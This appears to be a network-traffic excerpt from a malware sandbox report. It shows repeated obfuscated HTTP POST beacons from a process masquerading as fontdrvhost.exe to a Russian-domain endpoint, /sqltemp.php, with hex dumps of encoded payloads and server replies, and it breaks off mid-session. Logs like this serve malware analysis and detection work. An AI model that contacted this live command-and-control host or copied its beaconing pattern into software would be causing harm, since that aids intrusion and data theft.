                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:27.903424978 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:28.261713028 CET1012OUTData Raw: 56 5e 5f 5c 51 5c 54 55 58 56 52 59 56 5d 59 53 5b 52 54 51 55 5d 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V^_\Q\TUXVRYV]YS[RTQU]PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$" ?>%-;B8)7>#*97*=4\7<;6&<8.&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:53:28.346236944 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:28.609782934 CET805INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:28 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yGHxmRQzC0OnNHIugWGf3tOtU3e0wPgaV4fnbfO81U695CBxunFhX2apm86C1Sy3m5a%2FaxQUIot4pjHtZa6paWTZku%2FyggfI3kyneg0rIBozm%2BRjELlGKvK5nxhJzfGOU76lBGgj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fee7ec73c440-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2416&min_rtt=1503&rtt_var=2391&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=165645&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            115192.168.2.450081104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:28.728593111 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:29.074196100 CET1012OUTData Raw: 53 57 5f 57 54 5c 54 52 58 56 52 59 56 5c 59 5f 5b 5c 54 5b 55 5d 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SW_WT\TRXVRYV\Y_[\T[U]P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z3?6",:'E/:)W4.8Z<9<*.' "$<1,-*&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:53:29.192742109 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:29.459642887 CET808INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:29 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0e4rRNKEM9T0%2FNlZW9Shno1rCjGy0hCX8LuCQoTnKte9Tvlg0Jvh9V69kURL9T8eeY%2BmiDWAqBgEY6649Dam1dfWY%2F6uPxpdUmdm%2BHNJQQErzOmtcvT6NIcpnbX3C%2B9MML2ODq2p"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2feed2fd27c87-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4258&min_rtt=1888&rtt_var=5448&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=70020&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            116192.168.2.450087104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:29.588741064 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:29.933598995 CET1012OUTData Raw: 56 53 5f 51 54 5d 54 51 58 56 52 59 56 5f 59 55 5b 5c 54 51 55 5b 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VS_QT]TQXVRYV_YU[\TQU[PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z36#>0>(/* >'+:8(. !2\(;1,'U9:&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:53:30.045011044 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:30.214221954 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:30 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P2SiNEX0NvRPiUdb15V7crHwC3BLCfEg71TJk9LTLKxUUq51wJRpTKp08p3DoHCI6GdS16UUKp869Q9D18NcXsPEgOxj9t2BLd1hbn8FOe6o%2F6xTVA%2BVTs7okAp%2BfpF%2BOzDMJrti"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fef28b6942bd-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4447&min_rtt=1678&rtt_var=6168&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=61257&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            117192.168.2.450093104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:30.347722054 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:30.699337006 CET1012OUTData Raw: 53 54 5f 57 54 5d 51 55 58 56 52 59 56 5c 59 52 5b 5a 54 5d 55 5e 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: ST_WT]QUXVRYV\YR[ZT]U^P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$ Y1X3X</!W4=<Z+* *>4 Z(%, :&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:53:30.798696041 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:31.052902937 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:31 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xkuVUkxeSjpvTPLATswW9Em1u2DS7u%2F9YxsmbV%2BgRenLNfZ2VNyswpb%2FKmUr0v4z9NbbLQ3f3Naim9Z3rKHIU7qPu2GnTHuZtagy4CZ2TS5oQ2Lq67Htv%2FmJYskEJsypb2X4MmJH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fef738314304-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4061&min_rtt=1750&rtt_var=5278&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=72134&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            118192.168.2.450100104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:31.182378054 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:31.527422905 CET1012OUTData Raw: 56 55 5f 5d 54 5c 54 5d 58 56 52 59 56 5e 59 56 5b 5e 54 5a 55 5d 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VU_]T\T]XVRYV^YV[^TZU]P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3<)#<>'.',)%U =*9(-<7?+)@%Y(.:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:31.648525953 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:31.950557947 CET803INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:31 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1w%2BdMdNhIMVu8zAhHbY68n1OOylLNO49WTdSw2DsZvd%2FfKx15HFIspNzCJ65%2BCTzjCrWQ7qvpgEfraJ%2BqsyXMGIOIB1Eim%2B6U3s6bODnUBKmLIurv5iWFAMlgDtqqzKuTiGY2lkx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fefc7ab442d1-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4339&min_rtt=2291&rtt_var=4956&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=78154&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X
                                                                                                                                                                                            Jan 1, 2025 14:53:32.086225986 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            119192.168.2.450107104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:32.212224007 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:32.558749914 CET1012OUTData Raw: 56 57 5f 52 54 5e 54 52 58 56 52 59 56 5b 59 55 5b 5e 54 5c 55 5d 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VW_RT^TRXVRYV[YU[^T\U]PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y'=#/=Y3X7B81U4-??U*=4 "'[+(9A2Y$.&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:32.689398050 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:32.958375931 CET814INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:32 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IE3qXV%2BghPi2cey3%2FfwPrgB2%2Bs8%2FVE9%2BfdT1WwtPZLOFv0CK%2ByqY0Gl1LQo4hbnxfNfommFyiYxU4THX9atlabnx48iALT%2FQRdEsXm2wroCD%2BDp5zvk76ekpf5Df5NebHa6wp0nw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff030d617d16-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4674&min_rtt=1911&rtt_var=6244&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=60780&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            120192.168.2.450113104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:33.090452909 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:33.449290991 CET1012OUTData Raw: 56 5e 5a 53 54 5a 54 5d 58 56 52 59 56 5c 59 57 5b 5d 54 5e 55 5d 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V^ZSTZT]XVRYV\YW[]T^U]PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y$" ?&$=;C;:: -X+;W>X$Y!20<-D1<;S.*&Y.,Y-5


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            121192.168.2.450117104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:33.519196033 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:33.871119976 CET1852OUTData Raw: 56 56 5f 53 54 5b 54 56 58 56 52 59 56 5d 59 57 5b 5f 54 50 55 5e 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VV_ST[TVXVRYV]YW[_TPU^PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._'<5[ <&$, [#(9V=$!"7((=&/V.*&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:53:33.964046955 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:34.151750088 CET956INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:34 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BdgDrpDvUwIR24Zils2C9FTJVVYmzKv1HKqfqEyYg%2F8MAmiKcwaw2oPu%2FclRDSCJRXKLrwex2ABfq6hlu4Ybi8g0nUmaXRRomgzePloiM6l2Z1F4Gi7gw9NbV12gUcKz%2FnnDcjVJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff0aff4e41e7-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3226&min_rtt=2062&rtt_var=3102&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=128329&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 26 09 2a 2e 2e 56 26 1c 3b 00 2b 03 2c 0c 26 3e 00 13 2b 06 3a 15 24 00 2c 04 2a 3a 23 10 22 3c 3d 13 31 06 05 03 34 3e 24 07 27 1e 2b 59 05 1c 23 1a 22 2f 02 5e 3d 3e 3b 15 31 11 2d 59 24 2e 28 1b 3f 28 01 0f 22 3b 06 03 24 3e 38 1e 2a 14 2c 1d 24 3c 23 19 2d 59 2d 10 30 00 2c 54 00 11 26 55 25 21 16 58 23 09 3b 03 35 31 25 5e 26 0a 21 0b 24 2c 01 53 21 3a 32 16 26 21 24 03 36 0a 26 5e 31 3b 0f 13 20 03 27 51 2a 14 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98&*..V&;+,&>+:$,*:#"<=14>$'+Y#"/^=>;1-Y$.(?(";$>8*,$<#-Y-0,T&U%!X#;51%^&!$,S!:2&!$6&^1; 'Q*%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            122192.168.2.450120104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:33.645781994 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:33.996253014 CET1012OUTData Raw: 56 51 5a 50 54 50 51 52 58 56 52 59 56 5c 59 57 5b 59 54 5f 55 5d 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQZPTPQRXVRYV\YW[YT_U]PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'!X4?)$'@/)=S Z(:<* #'<]!1/,*&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:53:34.098443985 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:34.360364914 CET801INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:34 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wc4gr8aYO7Mvcwyl%2FdH9oIfN2bHE3mvUcB9oTWUImnHi2njiWJGuQqPhBlJHXyUbBV0RPres2WTKI3GgRLzJhCsXfJaOnOkN2Dq6ENtfklGVYKtRP0ttNneJlfJIktfBRsquHMyu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff0bdb8d437e-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
